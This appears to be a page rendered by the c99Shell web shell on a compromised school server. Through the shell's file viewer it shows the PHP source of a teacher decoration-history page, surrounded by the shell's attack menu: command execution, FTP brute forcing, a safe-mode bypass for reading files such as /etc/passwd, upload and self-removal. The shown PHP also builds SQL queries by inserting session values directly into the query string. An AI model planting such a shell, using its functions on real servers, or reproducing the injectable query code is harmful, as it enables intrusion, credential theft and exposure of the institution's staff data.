!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/teacher_aj_viratt/   drwxr-xr-x
Free 52.65 GB of 127.8 GB (41.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Show_Dec_History.php (8.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start
();

 if (
session_is_registered("valid_user")&&session_is_registered("Priority")&&session_is_registered("password") )
 {
 
$Username $valid_user;
 
$Password $password;
include(
"../include/FunctionDB.php");
include(
"../include/Function.php");
include(
"admin_menu.php");
 
ConnectDB();
$sql "Select * From personal_tb Where Username='$Username'";
$result mysql_query($sql) or die(" Error").mysql_error();
$rss mysql_fetch_array($result);
$Teacher_code $rss["Teacher_code"];
$sql2 "Select * FROM history_decoration_tb Where Teacher_code='$Teacher_code' Order By Year_receive Asc";
$result2 mysql_query($sql2) or die(" Error").mysql_error();
$num mysql_num_rows($result2);
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.style15 {font-size: 14px}
-->
</style>
<table width="802" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="802"><br>
          <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_teacher.php " >หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="Menu_History.php?Teacher_code=<? echo $rss[Teacher_code?>">ข้อมูลประวัติส่วนตัว</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" />ประวัติการรับพระราชทานเครื่องราชอิสริยาภรณ์</font></legend>
            <label><div align="center">
              <form id="form1" name="form1" method="post" action="Edit_Update_Work.php">
                <table width="91%" border="0" align="center" cellpadding="0" cellspacing="0" style=" border:0px solid gray"size="12">
                  <tr>
                    <td height="29" bgcolor="#FFFFFF"><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></td>
                  </tr>
                  <tr>
                    <td height="29" bgcolor="#FFFFFF"><span class="style15"><font face="Tahoma"><? echo $rs['Teacher_name'?> &nbsp;<? echo $rs['Teacher_lastname'?> รหัส <font face="Tahoma"><font face="Tahoma"><font face="Tahoma"><? echo $rs['Teacher_id'?></font></font></font><font face="Tahoma"><font face="Tahoma"><font face="Tahoma"></font></font></font></font></span></td>
                  </tr>
                  
                  <tr>
                    <td height="43" ><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#EEEEEE" style="border:0px solid gray">
                      <tr bgcolor="#F3D6F2">
                        <td height="21" colspan="7" bgcolor="#FFFFFF"><div align="center"><font color="#003366" face="Tahoma"><strong><span class="style15">&nbsp;&nbsp;ประวัติการรับพระราชทานเครื่องราชอิสริยาภรณ</span></strong></font><font color="#003366" size="4" face="Tahoma"><strong>์</strong></font></div></td>
                      </tr>
                      <tr bordercolor="#0066CC" bgcolor="#FDEEFC">
                        <td width="3%" style="border:1px solid gray"><div align="center"><font color="#000000" size="2" face="Tahoma">ที่</font></div></td>
                        <td width="11%" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma">ปีที่ได้รับ</font></div></td>
                        <td width="55%" bgcolor="#FDEEFC" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma">ชั้นเตรื่องราชฯ</font></div></td>
                        <td width="7%" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma">เล่มที่</font></div></td>
                        <td width="8%" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma">ตอนที่</font></div></td>
                        <td width="6%" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma">หน้า</font></div></td>
                        <td width="10%" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma">ลำดับที่</font></div></td>
                      </tr>
                      <?
$i 
1;
 while(
$rs mysql_fetch_array($result2))
 {

     if(
$count==0)
     {
?>
                      <tr bordercolor="#FFFBFF" bgcolor="#eeeeee">
                        <td height="18" align="center" bgcolor="#ECF5FF"><font color="#003366" size="2" face="Tahoma">
                          <?=$i?>
                        </font></td>
                        <td bgcolor="#ECF5FF"><div align="center"><font color="#003366" size="2" face="Tahoma"><?php echo $rs[Year_receive] ;?></font></div></td>
                        <td bgcolor="#ECF5FF"><font size="2" face="Tahoma">&nbsp;</font><font color="#003366" size="2" face="Tahoma"><?php echo $rs[Decoration_name] ;?></font></td>
                        <td bgcolor="#ECF5FF"><div align="center"><font color="#003366" size="2" face="Tahoma">
                            <?php 
      
echo "$rs[Volumn]";
      
?>
                        </font></div></td>
                        <td bgcolor="#ECF5FF"><div align="center"><font color="#003366" size="2" face="Tahoma">
                            <?php 
      
echo "$rs[Col]";
      
?>
                        </font></div></td>
                        <td bgcolor="#ECF5FF"><div align="center"><font color="#003366" size="2" face="Tahoma">
                            <?php 
      
echo "$rs[Page]";
      
?>
                        </font></div></td>
                        <td bgcolor="#ECF5FF"><div align="center"><font color="#003366" size="2" face="Tahoma">
                            <?php 
      
echo "$rs[Orderlist]";
      
?>
                        </font></div></td>
                      </tr>
                      <?
    $count
=1;
     }
else
{
?>
                      <tr bordercolor="#FFFFFF" bgcolor="#FFFFFF">
                        <td align="center"><font color="#003366" size="2" face="Tahoma">
                          <?=$i?>
                        </font></td>
                        <td><div align="center"><font color="#003366" size="2" face="Tahoma"><?php echo $rs[Year_receive] ;?></font></div></td>
                        <td><font size="2" face="Tahoma">&nbsp;</font><font color="#003366" size="2" face="Tahoma"><?php echo $rs[Decoration_name] ;?></font></td>
                        <td><div align="center"><font color="#003366" size="2" face="Tahoma">
                            <?php 
      
echo "$rs[Volumn]";
      
?>
                        </font></div></td>
                        <td><div align="center"><font color="#003366" size="2" face="Tahoma">
                            <?php 
      
echo "$rs[Col]";
      
?>
                        </font></div></td>
                        <td><div align="center"><font color="#003366" size="2" face="Tahoma">
                            <?php 
      
echo "$rs[Page]";
      
?>
                        </font></div></td>
                        <td><div align="center"><font color="#003366" size="2" face="Tahoma">
                            <?php 
      
echo "$rs[Orderlist]";
      
?>
                        </font></div></td>
                      </tr>
                      <?
$count
=0;
}
$i++;
 }    
?>
                      <tr bgcolor="#FDEEFC">
                        <td colspan="7" align="center" bgcolor="#FFFFFF"><div align="center"><strong><font color="#003366" size="2" face="Tahoma">ทั้งหมด</font><font color="#FF0000" size="2" face="Geneva, Arial, Helvetica, sans-serif"> <? echo $num ?><font color="#003366" face="Tahoma"> รายการ</font> </font></strong></div></td>
                      </tr>
                    </table></td>
                  </tr>
                </table>
              </form>
              </div>
            </label>
        </fieldset><br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br>
      </font></td>
    </tr>
</table>
<?php 
    
}
else
{
       echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0064 ]--